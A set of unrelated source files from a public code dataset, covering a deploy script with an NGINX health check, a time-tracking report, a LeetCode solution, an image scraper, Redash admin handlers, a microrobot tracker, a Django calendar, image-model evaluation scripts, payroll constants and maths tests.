print('\\nERROR: can\\'t reload NGINX\\n')\n exit(1)\n\n nginx_status = run('curl -s localhost > /dev/null')\n\n if nginx_status.return_code == 0:\n print('\\nOK: NGINX reloaded status code: {}\\n'.format(nginx_status.return_code))\n else:\n print('\\nERROR: NGINX reloaded status code: {}\\n'.format(nginx_status.return_code))\n exit(1)\n\nif __name__ == \"__main__\":\n\n try:\n gw_account_name = os.environ['GW_ACCOUNT_NAME']\n gw_account_key = os.environ['GW_ACCOUNT_KEY']\n gw_account_share = os.environ['GW_ACCOUNT_SHARE']\n\n bac_account_name = os.environ['BAC_ACCOUNT_NAME']\n bac_account_key = os.environ['BAC_ACCOUNT_KEY']\n bac_account_container = os.environ['BAC_ACCOUNT_CONTAINER']\n\n backup_local_path = os.environ['BAC_LOCAL_PATH']\n\n gw_proxy_host = os.environ['GW_PROXY_HOST']\n gw_proxy_user = os.environ['GW_PROXY_USER']\n gw_proxy_key = os.environ['GW_PROXY_KEY']\n gw_proxy_ports = [2200, 2201]\n\n except KeyError as e:\n print('ERROR: no such environment variable - {}'.format(e))\n sys.exit(1)\n\n # download all files and directories from:\n # $gw_account_name (jmgatewayproxydata) $gw_account_share (gwproxydata)\n # to $backup_local_path (/tmp/GW_TEMP_BACKUP)\n get_backup(gw_account_name, gw_account_key, gw_account_share, backup_local_path)\n\n # upload all data from:\n # $backup_local_path (/tmp/GW_TEMP_BACKUP)\n # to:\n # $bac_account_name (jmbackup) $bac_account_container (jm-gw-proxy-backup)\n push_backup(bac_account_name, bac_account_key, bac_account_container, backup_local_path)\n\n # upload all *.conf files from local directory (i.e. cloned repository)\n # to the $gw_account_name (jmgatewayproxydata) $gw_account_share (gwproxydata)\n update_datanginxconfd(gw_account_name, gw_account_key, gw_account_share)\n\n # SSH to the $gw_proxy_host (jm-gw-proxy-production.domain.tld)\n # and execute:\n # 1. nginx -t\n # 2. systemctl reload nginx.service\n # 3. 
curl -s localhost > /dev/null\n nginx_reload(gw_proxy_host, gw_proxy_user, gw_proxy_key, gw_proxy_ports)\n\n # remove local $backup_local_path (/tmp/GW_TEMP_BACKUP)\n # just in case, as anyway builds are in Travis Docker containers\n cleanup_backup_local_path(backup_local_path)\n","repo_name":"setevoy2/rtfm","sub_path":"14827/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":7035,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"5723576508","text":"from timew import timewarrior\nfrom datetime import date, datetime, timedelta\nimport subprocess\n\n\ndef calculate_totals():\n date_format = '%Y%m%dT%H%M%SZ'\n\n tw = timewarrior.TimeWarrior()\n summary = tw.summary('1970-01-01', datetime.now())\n unproductive_tags = get_unproductive_tags()\n\n totals = {}\n for entry in summary:\n start = datetime.strptime(entry['start'], date_format)\n if 'end' in entry:\n end = datetime.strptime(entry['end'], date_format)\n else:\n end = datetime.utcnow()\n\n elapsed = end - start\n week = start.strftime('%Y-%U')\n if week not in totals:\n totals[week] = {\n '_all': timedelta(0),\n '_prod': timedelta(0)\n }\n\n for tag in entry['tags']:\n if tag in totals[week]:\n totals[week][tag] += elapsed\n else:\n totals[week][tag] = elapsed\n\n totals[week]['_all'] += elapsed\n\n if is_productive(entry['tags'], unproductive_tags):\n totals[week]['_prod'] += elapsed\n\n for week in totals:\n for tag in totals[week]:\n totals[week][tag] = timedelta_format(totals[week][tag])\n\n return totals\n\n\ndef timedelta_format(delta):\n total_seconds = int(delta.total_seconds())\n hours, remainder = divmod(total_seconds, 60 * 60)\n minutes, seconds = divmod(remainder, 60)\n\n return f'{hours:02}:{minutes:02}:{seconds:02}'\n\n\ndef get_unproductive_tags():\n config_key = 'custom.unproductive_tags'\n\n result = subprocess.run(\n ['timew', 'get', f'dom.rc.{config_key}'], capture_output=True, text=True)\n tags = result.stdout.strip().split(',')\n return tags\n\n\ndef is_productive(entry_tags, unproductive_tags):\n for tag in entry_tags:\n if tag not in unproductive_tags:\n return True\n\n return False\n","repo_name":"rc2dev/timew-web-report","sub_path":"tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"70268920193","text":"from typing import List\nfrom collections import defaultdict\n\nclass Solution:\n def fourSumCount(self, nums1: List[int], nums2: List[int], nums3: List[int], nums4: List[int]) -> int:\n dict, ans = defaultdict(int), 0\n for i in nums1:\n for j in nums2:\n dict[i+j] +=1\n for k in nums3:\n for l in nums4:\n ans += dict[0 - (k + l)]\n return ans\n\ns = Solution()\ns.fourSumCount()","repo_name":"zaoad/Leetcode","sub_path":"454_sum_II.py","file_name":"454_sum_II.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43631589036","text":"# /usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport requests\nimport re\n\n\nhead = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/70.0.3538.67 Safari/537.36'}\n\nurl=input('输入url')\nres=requests.get(url='{}'.format(url),headers=head)\na=res.content.decode('UTF-8')\nzhengze=input('请输入正则表达式')\npatt=re.compile('{}'.format(zhengze))\nitems=patt.findall(a)\naaa=0\nfor i in items:\n if \" title=\" in i:\n 
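# entries whose matched markup carries a title attribute are images; the next lines rebuild an absolute URL by prepending the site's image host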
i='http://mpic.spriteapp.cn/'+i\n i=i.split('\"')[0]\n tupian=requests.get(url=i)\n res1=tupian.content\n if 'gif' in i:\n with open(r'C:\\Users\\meng\\Desktop\\python\\图片1\\{}.gif'.format(aaa),'wb') as f:\n f.write(res1)\n aaa+=1\n elif 'jpg' in i:\n with open(r'C:\\Users\\meng\\Desktop\\python\\图片1\\{}.jpg'.format(aaa), 'wb') as f:\n f.write(res1)\n aaa += 1\n\n\n","repo_name":"menglf1203/python","sub_path":"课堂/爬图片.py","file_name":"爬图片.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37039386195","text":"import json\n\nfrom flask import request\nfrom flask_login import login_required\nfrom redash import models, redis_connection\nfrom redash.handlers import routes\nfrom redash.handlers.base import json_response\nfrom redash.permissions import require_super_admin\nfrom redash.tasks.queries import QueryTaskTracker\n\n\n@routes.route('/api/admin/queries/outdated', methods=['GET'])\n@require_super_admin\n@login_required\ndef outdated_queries():\n manager_status = redis_connection.hgetall('redash:status')\n query_ids = json.loads(manager_status.get('query_ids', '[]'))\n if query_ids:\n outdated_queries = (models.db.session.query(models.Query)\n .outerjoin(models.QueryResult)\n .filter(models.Query.id.in_(query_ids))\n .order_by(models.Query.created_at.desc()))\n else:\n outdated_queries = []\n\n return json_response(\n dict(queries=[q.to_dict(with_stats=True, with_last_modified_by=False)\n for q in outdated_queries],\n updated_at=manager_status['last_refresh_at']))\n\n\n@routes.route('/api/admin/queries/tasks', methods=['GET'])\n@require_super_admin\n@login_required\ndef queries_tasks():\n global_limit = int(request.args.get('limit', 50))\n waiting_limit = int(request.args.get('waiting_limit', global_limit))\n progress_limit = int(request.args.get('progress_limit', global_limit))\n done_limit = int(request.args.get('done_limit', global_limit))\n\n waiting = QueryTaskTracker.all(QueryTaskTracker.WAITING_LIST, limit=waiting_limit)\n in_progress = QueryTaskTracker.all(QueryTaskTracker.IN_PROGRESS_LIST, limit=progress_limit)\n done = QueryTaskTracker.all(QueryTaskTracker.DONE_LIST, limit=done_limit)\n\n response = {\n 'waiting': [t.data for t in waiting if t is not None],\n 'in_progress': [t.data for t in in_progress if t is not None],\n 'done': [t.data for t in done if t is not None]\n }\n\n return json_response(response)\n","repo_name":"repertory/docker-redash","sub_path":"data/redash/redash/handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"60"} +{"seq_id":"21839713516","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 24 15:51:31 2022\n\n@author: bizzarohd\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nfrom pySerialTransfer import pySerialTransfer as txfer\n\n\n\n\n'''\nsignal output is now compeltely indpendent of frame rate\nI just send an actions list to arduino mega which has 12 PWM outputs \n'''\n\ncontrol_params = {\n \"lower_thresh\": 0,\n \"upper_thresh\": 100,\n \"bounding_length\" : 10,\n \"area_filter\": 3,\n \"field_strength\": 1,\n \"rolling_frequency\": 10.0,\n \"gamma\": 90\n } \ncamera_params = {\n \"resize_scale\": 50,\n \"framerate\": 60,\n \"exposure\": 5000\n } \n\n\nclass Robot:\n '''\n Robot class to store and ID all new robots\n '''\n def __init__(self):\n 
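# per-robot history buffers: the tracker loop appends one position/area/time/frequency/alpha sample per processed frame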
self.Position_List = []\n self.Area_List = []\n self.Cropped_frame = []\n self.Avg_Area = 0\n self.Time = []\n self.Frequency = []\n self.Alpha_List = []\n \n def add_area(self,Area):\n self.Area_List.append(Area)\n \n def add_position(self, Position):\n self.Position_List.append(Position)\n \n def add_frame(self,Frame):\n self.Frame_List.append(Frame)\n \n def add_Crop(self,Crop):\n self.Cropped_frame.append(Crop)\n \n def set_Avg_Area(self,Avg_Area):\n self.Avg_Area = Avg_Area\n \n def add_time(self,time):\n self.Time.append(time)\n \n def add_freq(self,f):\n self.Frequency.append(f)\n \n def add_alphas(self, alph):\n self.Alpha_List.append(alph)\n\n\n\n\n\nclass Experiment():\n def __init__(self):\n self.Robot_List = []\n self.num_bots = 0 \n self.frame_num = 0 \n\n\n def mousePoints(self,event,x,y,flags,params):\n \n '''\n Mouse Callback. To run when the left mouse is clicked\n Initilize a new robot instance on each mouse click\n '''\n # Left button mouse click event opencv\n if event == cv2.EVENT_LBUTTONDOWN:\n \n x1 = int(x-control_params[\"bounding_length\"]/2)\n y1 = int(y-control_params[\"bounding_length\"]/2)\n w = control_params[\"bounding_length\"]\n h = control_params[\"bounding_length\"]\n \n robot = Robot()\n robot.add_Crop([x1,y1,w,h])\n \n self.Robot_List.append(robot)\n self.num_bots += 1\n \n def Send(self,arduino,alpha,freq,typ):\n message = arduino.tx_obj([float(alpha),float(freq),float(typ)]) #float(0) => Rolling\n arduino.send(message)\n print(\"sent\")\n \n \n\n def Tracker(self, arduino, actions): \n\n '''\n connect to camera and pperform real time tracking and analysis of MR\n ''' \n #cam = EasyPySpin.VideoCapture(0)\n cam = cv2.VideoCapture(\"/Users/bizzarohd/Desktop/UpdateOctober/mickyroll1.mp4\") \n width = int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n\n cv2.namedWindow(\"im\")\n\n while True:\n #!!! Step 1: read the frame and adjust it\n success,frame = cam.read()\n \n resize_scale = camera_params[\"resize_scale\"]\n cam.set(cv2.CAP_PROP_EXPOSURE,camera_params[\"exposure\"])\n frame = cv2.resize(frame, (int(width*resize_scale/100),int(height*resize_scale/100)),interpolation = cv2.INTER_AREA)\n \n self.frame_num += 1\n cv2.setMouseCallback(\"im\", self.mousePoints)\n \n \n if self.num_bots > 0: #for each defined robot, update stuff\n \n #!!! Step 2: recieve action commands, either from joystick or exterinally\n if actions is not None:\n #read input arrays\n timestamp = self.frame_num\n if timestamp < len(actions[0]):\n \n alpha = actions[0][timestamp]\n freq = actions[1][timestamp]\n typ = actions[2]\n print(\"sent\")\n else:\n print(\"-- End of Trajectory --\")\n \n else: \n #read joystick...\n alpha = np.random.randint(-10,10) #control direction\n freq = np.random.randint(0,20) # control speed\n typ = 0\n \n \n \n #!!! Step 3: send those action commands to arduino\n self.Send(arduino,alpha,freq,typ)\n \n \n #!!! 
Step 4: detect,track, and update robot parameters\n for bot in range(len(self.Robot_List)):\n \n x1,y1,x2,y2 = self.Robot_List[bot].Cropped_frame[-1]\n \n x1 = max(min(x1,width),0)\n y1 = max(min(y1,height),0)\n cropped_frame = frame[y1:y1+y2, x1:x1+x2]\n \n \n #carry out mask and thresholding on GPU\n #gpu_frame = cv2.cuda_GpuMat()\n #gpu_frame.upload(cropped_frame)\n\n #gpu_frame = cv2.cuda.cvtColor(gpu_frame, cv2.COLOR_BGR2GRAY)\n crop_mask = cv2.cvtColor(cropped_frame, cv2.COLOR_BGR2GRAY)\n crop_mask = cv2.GaussianBlur(crop_mask, (21,21), 0)\n crop_mask = cv2.inRange(crop_mask, (control_params[\"lower_thresh\"]),(control_params[\"upper_thresh\"]))\n #ret,gpu_frame = cv2.cuda.threshold(gpu_frame, control_params[\"upper_thresh\"],255,cv2.THRESH_BINARY)\n #gpu_frame = cv2.cuda.bitwise_not(gpu_frame)\n #crop_mask = gpu_frame.download()\n \n #find contours and areas of contours \n contours,_ = cv2.findContours(crop_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n \n area_threshold_lower = self.Robot_List[bot].Avg_Area /control_params[\"area_filter\"]\n area_list = []\n w_list = [] #creating these lists to store all conoutrs because I only want the first w,h not the most recent one\n h_list = []\n for cnt in contours:\n #remove small elements by calcualting arrea\n area = cv2.contourArea(cnt)\n \n if area > area_threshold_lower:# and area < 3000:# and area < 2000: #pixels\n area_list.append(area)\n \n x,y,w,h = cv2.boundingRect(cnt)\n current_pos = [(x+x+w)/2, (y+y+h)/2]\n w_list.append(w)\n h_list.append(h)\n\n cv2.rectangle(cropped_frame, (x,y), (x+w,y+h),(255,0,0),1)\n cv2.drawContours(cropped_frame,[cnt], -1,(0,255,255),1)# -1: draw all\n \n \n if area_list:\n \n #cacluate and analyze contours areas\n avg_area = sum(area_list)/len(area_list)\n self.Robot_List[bot].add_area(avg_area)\n \n avg_global_area = sum(self.Robot_List[bot].Area_List)/len(self.Robot_List[bot].Area_List)\n self.Robot_List[bot].set_Avg_Area(avg_global_area)\n #update cropped region based off new position and average area\n \n x1new = x1+current_pos[0]-max(w_list)\n y1new = y1+current_pos[1]-max(h_list)\n x2new = 2*max(w_list)\n y2new = 2*max(h_list)\n new_crop = [int(x1new), int(y1new), int(x2new), int(y2new)]\n \n #update robots params\n self.Robot_List[bot].add_Crop(new_crop)\n self.Robot_List[bot].add_position([current_pos[0]+x1, current_pos[1]+y1]) \n self.Robot_List[bot].add_time(time.time())\n self.Robot_List[bot].add_freq(freq)\n self.Robot_List[bot].add_alphas(alpha)\n \n \n color = plt.cm.rainbow(np.linspace(0, 1, self.num_bots))*255 \n for bot,c in zip(range(self.num_bots),color):\n #display dragon tails \n pts = np.array(self.Robot_List[bot].Position_List, np.int32)\n cv2.polylines(frame, [pts], False, c, 1)\n \n \n \n #!!! 
Step 5: display the frames\n cv2.imshow(\"im\", frame)\n k = cv2.waitKey(1000)\n if k == ord(\"q\"):\n break\n \n #close coils\n message = arduino.tx_obj([float(0),float(0),float(4)]) #float(4) => Close\n arduino.send(message)\n \n #close camera\n cam.release()\n cv2.destroyAllWindows()\n\n\n\ndef run_exp(actions):\n '''\n press left mouse button on robot to detect\n press q to exit the window\n \n Parameters:\n actions : if None == learn via joystick\n else: pass actions list [alpha,freq,type].right now it just indexs through the list by frame number\n aim : 1 = LEARN, 2 = RL\n Returns: (X,Y,alpha,time,freq) if bots were detected\n None if else\n\n '''\n #connect to arduino\n arduino = txfer.SerialTransfer('/dev/cu.usbserial-210')\n arduino.open()\n Exp = Experiment() #create an experiement\n Exp.Tracker(arduino,actions) #run the tracker\n \n if len(Exp.Robot_List) > 0:\n MyRobot = Exp.Robot_List[-1] # only use last robot in list of clicked on robots\n \n X = np.array(MyRobot.Position_List)[:,0]\n Y = np.array(MyRobot.Position_List)[:,1]\n alpha = np.array(MyRobot.Alpha_List)\n time= np.array(MyRobot.Time)\n freq= np.array(MyRobot.Frequency)\n print(\"-- robies detected --\")\n return X,Y,alpha,time,freq\n else:\n print(\"-- no robies --\")\n return None\n\n arduino.close()\n\n return X,Y,alpha,time,freq\n\nif __name__ == '__main__':\n #actions\n a = np.arange(0,360,1) #alpha\n b = [] \n for i in range(0,360):\n b.append(5)\n c = 0\n\n actions = None#[a,b,c]\n\n \n X,Y,alpha,time,freq = run_exp(actions) \n\n","repo_name":"SuhailSama/MR_RL","sub_path":"MR_experiment.py","file_name":"MR_experiment.py","file_ext":"py","file_size_in_byte":10912,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"25285565854","text":"# https://www.huiwenteo.com/normal/2018/07/29/django-calendar-ii.html\nfrom datetime import datetime, timedelta\nfrom calendar import HTMLCalendar\nfrom .models import Workout\n\nclass Calendar(HTMLCalendar):\n\tdef __init__(self, year=None, month=None):\n\t\tself.year = year\n\t\tself.month = month\n\t\tsuper(Calendar, self).__init__()\n\n\t# formats a day as a td\n\t# filter workouts by day\n\tdef formatday(self, day, workouts, user):\n\t\tworkouts_per_day = workouts.filter(day__day=day, user_id=user.id)\n\t\td = ''\n\t\tfor workout in workouts_per_day:\n\t\t\tcolor = 'yellow'\n\t\t\tif workout.complete:\n\t\t\t\tcolor = 'green'\n\t\t\td += f'
<li style=\"color: {color}\"> {workout.get_html_url} </li>'\n\n\t\tif day != 0:\n\t\t\treturn f\"<td><span class='date'>{day}</span><ul> {d} </ul></td>
    \"\n\t\treturn ''\n\n\t# formats a week as a tr \n\tdef formatweek(self, theweek, workouts, user):\n\t\tweek = ''\n\t\tfor d, weekday in theweek:\n\t\t\tweek += self.formatday(d, workouts, user)\n\t\treturn f' {week} '\n\n\t# formats a month as a table\n\t# filter workouts by year and month\n\tdef formatmonth(self, user, withyear=True):\n\t\tworkouts = Workout.objects.filter(day__year=self.year, day__month=self.month)\n\n\t\tcal = f'\\n'\n\t\tcal += f'{self.formatmonthname(self.year, self.month, withyear=withyear)}\\n'\n\t\tcal += f'{self.formatweekheader()}\\n'\n\t\tfor week in self.monthdays2calendar(self.year, self.month):\n\t\t\tcal += f'{self.formatweek(week, workouts, user)}\\n'\n\t\treturn cal\n","repo_name":"mitchdmarino/Flex","sub_path":"workout/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29159111965","text":"import os\nfrom shutil import copy\nimport random\n\nimport argparse\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nimport torch\nfrom torchvision import utils\nfrom torch import nn\nimport os\nimport numpy as np\nfrom model import Generator\nfrom dataset import ImgDataset\nfrom Unet import Unet\nfrom utils import *\nfrom PIL import Image\nimport pickle\npalette = [ ( 0, 0, 0),\n( 0, 0, 0), \n( 0, 0, 0),\n( 0, 0, 0), \n( 0, 0, 0), \n(111, 74, 0), \n( 81, 0, 81),\n(128, 64,128),\n(244, 35,232),\n(250,170,160),\n(230,150,140),\n( 70, 70, 70),\n(102,102,156),\n(190,153,153),\n(180,165,180),\n(150,100,100),\n(150,120, 90),\n(153,153,153),\n(153,153,153),\n(250,170, 30),\n(220,220, 0),\n(107,142, 35),\n(152,251,152),\n( 70,130,180),\n(220, 20, 60),\n(255, 0, 0),\n( 0, 0,142),\n( 0, 0, 70),\n( 0, 60,100),\n( 0, 0, 90),\n( 0, 0,110),\n( 0, 80,100),\n( 0, 0,230),\n(119, 11, 32),\n( 0, 0,142)]\n\n# gta2city = {0:0, 1:5, 2:23, 3:7, 4:8, 5:9, 6:22, 7:21, 8:21, 9:11, 10:5, 11:4, 12:, 13:19, 14:20, 15:, 16:}\n\n# apath = '/scratch/zikunc/cygan/ds_small/trainA'\n# alabelpath = '/scratch/zikunc/cygan/ds_small/trainA_labels'\n\n# domainA = sorted([f for f in os.listdir(apath) if f.endswith('.jpg')])\n# domainA_labels = sorted([f for f in os.listdir(alabelpath) if f.endswith('.jpg')])\n# idxs = random.sample(range(len(domainA)), 300)\n# cityTestPath = '/scratch/zikunc/cygan_/testCITY'\n\n# for idx in idxs:\n# \tcopy(os.path.join(apath, domainA[idx]),os.path.join(cityTestPath, 'x', domainA[idx]))\n# \tcopy(os.path.join(alabelpath, domainA_labels[idx]),os.path.join(cityTestPath, 'gt', domainA_labels[idx]))\n\n\n\n\n\n# bpath = '/scratch/zikunc/cygan_/ds_fullcity/trainB'\n# blabelpath = '/scratch/zikunc/cygan_/out'\n\n# domainB = sorted([f for f in os.listdir(bpath) if f.endswith('.png')])\n# domainB_labels = sorted([f for f in os.listdir(blabelpath) if f.endswith('.png')])\n# idxs = random.sample(range(len(domainB)), 300)\n# gtaTestPath = '/scratch/zikunc/cygan_/testGTA'\n\n# for idx in idxs:\n# \tcopy(os.path.join(bpath, domainB_labels[idx]),os.path.join(gtaTestPath, 'x', domainB_labels[idx]))\n# \tcopy(os.path.join(blabelpath, domainB_labels[idx]),os.path.join(gtaTestPath, 'gt', domainB_labels[idx]))\n\n\ndef main(args):\n\n segmen_A = Unet(3, 34).to(args.device)\n\n if args.model_path is not None:\n segmen_path = os.path.join(args.model_path,'semsg.pt')\n\n with open(segmen_path, 'rb') as f:\n state_dict = torch.load(f)\n segmen_A.load_state_dict(state_dict)\n\n else:\n raise Exception('please specify model 
path!')\n\n segmen_A = nn.DataParallel(segmen_A)\n\n transforms_ = [ transforms.ToTensor(),\n transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)) ]\n testloader = DataLoader(ImgDataset(args.image_path, transforms_=transforms_, mode='eval_unet'),\n batch_size=args.batchSize, shuffle=False, num_workers=0)\n\n segmen_A.eval()\n\n with torch.no_grad():\n total_iou = []\n for i, batch in enumerate(testloader):\n name, toTest, labels = batch\n #segmentation\n pred_label = segmen_A(toTest)\n for idx in range(args.batchSize):\n pred = pred_label[idx].cpu().numpy()\n label = labels.cpu().numpy()[idx]\n img = np.zeros((label.shape[0],label.shape[1],3)).astype('uint8')\n original_img = np.zeros((label.shape[0],label.shape[1],3)).astype('uint8')\n prediction = np.zeros((label.shape[0],label.shape[1])).astype('uint8')\n for c in range(len(palette)):\n indices = np.argmax(pred,axis=0)==c\n prediction[indices]=c\n img[indices] = palette[c]\n original_img[label==c] = palette[c]\n original_img = Image.fromarray(original_img.astype('uint8'))\n original_img.save(os.path.join(args.out_dir,'original_'+name[idx].replace('jpg','png')))\n img = Image.fromarray(img.astype('uint8'))\n img.save(os.path.join(args.out_dir,name[idx].replace('jpg','png')))\n total_iou.append(IOU(prediction, label, 34))\n print(sum(total_iou)/len(total_iou))\n # f = open('mapping.pkl', 'wb')\n # pickle.dump(mapping, f)\n # f.close()\n\n # print(sum(total_iou)/len(total_iou))\n\n\n # for idx in range(len(name)):\n # utils.save_image(torch.cat((toTest[idx].to(args.device), recovered[idx], transformed_[idx]),axis=1), os.path.join(args.out_dir, args.direction+'_'+name[idx].split('/')[-1]), normalize=True, range=(-1, 1))\n\n\n\n\n\n\nif __name__ == '__main__':\n import os\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--image_path', type=str, help='path to the test images')\n parser.add_argument('--model_path', type=str, help='path to the model checkpoint', default=None)\n parser.add_argument('--out_dir', type=str, help='output dir', default='./')\n parser.add_argument('--device', type=str, help='set the device', default='cuda')\n parser.add_argument('--in_channel', type=int, default=3, help='number of channels of input data')\n parser.add_argument('--out_channel', type=int, default=3, help='number of channels of output data')\n parser.add_argument('--batchSize', type=int, default=1, help='size of the batches')\n parser.add_argument('--direction', type=str, default='AB', help='direction of domain transfer')\n\n args = parser.parse_args()\n print(args)\n\n if torch.cuda.is_available() and args.device != 'cuda':\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n if not os.path.exists(args.out_dir):\n os.makedirs(args.out_dir)\n\n args.device = torch.device(args.device)\n main(args)\n\n\n","repo_name":"zikuncshelly/cycleGAN_with_segmentation","sub_path":"test_semseg.py","file_name":"test_semseg.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"17393923618","text":"\"\"\"\r\nEste archivo contiene las constantes que se usan en el programa.\r\n\"\"\"\r\nimport os\r\n\r\narl: dict[str, float] = {\r\n \"riesgo_1\": 0.00522, # 0.522%\r\n \"riesgo_2\": 0.01044, # 1.044%\r\n \"riesgo_4\": 0.04350, # 4.350%\r\n}\r\n\r\n\r\nclass Administrativo:\r\n \"\"\"Clase que representa un empleado administrativo\"\"\"\r\n\r\n id = 1\r\n valor_hora = 20000\r\n valor_hora_extra = 25000\r\n riesgo_arl = 
arl[\"riesgo_1\"]\r\n cargo = \"Administrativo\"\r\n\r\n\r\nclass Operativo:\r\n \"\"\"Clase que representa un empleado operativo\"\"\"\r\n\r\n id = 2\r\n valor_hora = 40000\r\n valor_hora_extra = 0\r\n cargo: dict[str, str] = {\r\n \"oficios_generales\": \"Oficios generales\",\r\n \"conductor\": \"Conductor\",\r\n \"vigilante\": \"Vigilante\",\r\n }\r\n riesgo_arl: dict[str, float] = {\r\n \"oficios_generales\": arl[\"riesgo_1\"],\r\n \"conductor\": arl[\"riesgo_2\"],\r\n \"vigilante\": arl[\"riesgo_4\"],\r\n }\r\n horas_trabajadas: dict[str, int] = {\r\n \"oficios_generales\": 100,\r\n \"conductor\": 160,\r\n \"vigilante\": 336,\r\n }\r\n\r\n\r\ndef limpiar_pantalla() -> None:\r\n \"\"\"\r\n Esta función se encarga de limpiar la pantalla de la consola\r\n \"\"\"\r\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\r\n","repo_name":"ZUR1C4T0/pyroll-module-cli","sub_path":"utilidades/constantes.py","file_name":"constantes.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30221274609","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/1/10 23:38\n# @Author : xls56i\n\nfrom __future__ import print_function\nimport networks\nimport argparse\nimport numpy as np\nimport torch.nn as nn\nimport torch\nimport cv2\nimport os, datetime\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"7\"\n\nparser = argparse.ArgumentParser(description='PyTorch CycleGAN')\nparser.add_argument('--set_dir', default='../dataset/CT_Data_All_Patients/test', type=str,\n help='directory of test dataset')\nparser.add_argument('--model_dir', default='./models/DnCNNB-simulation-60mAs_G_A',\n help='directory of the model:G_A==>high2low,simulate, G_B==>low2high,denoising')\nparser.add_argument('--model_name', default='model_001_007.pth', type=str, help='the model name')\nparser.add_argument('--isTrain', default=False, help='Train or Test')\nparser.add_argument('--result_dir', default='../dataset/CT_Data_All_Patients/test002030_simulate60mAs', type=str, help='directory of test dataset')\n\nargs = parser.parse_args()\n\n\ndef log(*args, **kwargs):\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S:\"), *args, **kwargs)\n\nif __name__ == '__main__':\n\n cuda = torch.cuda.is_available()\n\n netG = networks.define_G(1, 1, 64, 'unet_64', 'batch', False, 'normal', 0.02)\n\n if cuda:\n netG = netG.cuda()\n device_ids = [0]\n netG = nn.DataParallel(netG, device_ids=device_ids).cuda()\n\n netG.load_state_dict(torch.load(os.path.join(args.model_dir, args.model_name)))\n log('load trained model')\n\n netG.eval() # evaluation mode\n\n if not os.path.exists(args.result_dir):\n os.makedirs(args.result_dir)\n\n for im in os.listdir(args.set_dir):\n if im.endswith(\".tif\") or im.endswith(\".jpg\") or im.endswith(\".bmp\") or im.endswith(\".png\"):\n x = cv2.imread(os.path.join(args.set_dir, im), 0)\n pre_img = x\n height, weight = x.shape\n resize_h = round(height / 64) * 64\n resize_w = round(weight / 64) * 64\n x = cv2.resize(x, (resize_w, resize_h), interpolation=cv2.INTER_LINEAR)\n x = np.array(x, dtype=np.float32) / 255.0\n x = torch.from_numpy(x).view(1, -1, x.shape[0], x.shape[1])\n\n x_ = netG(x) # inference\n x_ = x_.view(x_.shape[2], x_.shape[3])\n x_ = x_.cpu()\n x_ = x_.detach().numpy().astype(np.float32)\n x_ = cv2.resize(x_, (weight, height), interpolation=cv2.INTER_LINEAR)\n\n x_[np.where(pre_img == 0)] = 0\n x_ = x_ * 255.0\n x_ = np.array(x_, dtype='uint8')\n 
cv2.imwrite(os.path.join(args.result_dir, im), x_)\n","repo_name":"cswin/PIMA-CT","sub_path":"Simulation_Evaluation/simulate_data.py","file_name":"simulate_data.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"13990492484","text":"import unittest\n\nimport maths_questions as maths_q\n\n\nclass MathsQuestionsTest(unittest.TestCase):\n\n def test_divisible_by_r(self):\n\n answer = maths_q.divisible_by_r(4, 6)\n self.assertEqual(answer, 12)\n\n answer = maths_q.divisible_by_r(55, 40)\n self.assertEqual(answer, 440)\n\n def test_generate_rand_7(self):\n\n ans = maths_q.generate_rand_7()\n print('Random number -> ', ans)\n\n def test_sample_distribution(self):\n\n numbers = [1, 2, 3, 4]\n probabilities = [0.1, 0.2, 0.3, 0.4]\n\n new_nums = maths_q.sample_distribution(numbers,\n probabilities,\n 10)\n print('New samples ->', new_nums)\n\n def test_factorial_trailing_zero(self):\n\n zero_count = maths_q.factorial_trailing_zero(5)\n self.assertEqual(zero_count, 1)\n\n zero_count = maths_q.factorial_trailing_zero(28)\n self.assertEqual(zero_count, 6)\n\n zero_count = maths_q.factorial_trailing_zero(200)\n self.assertEqual(zero_count, 49)\n\n def test_closest_palindrome_number(self):\n\n closest_pal = maths_q.closest_palindrome_number(1234)\n self.assertEqual(closest_pal, 1221)\n\n closest_pal = 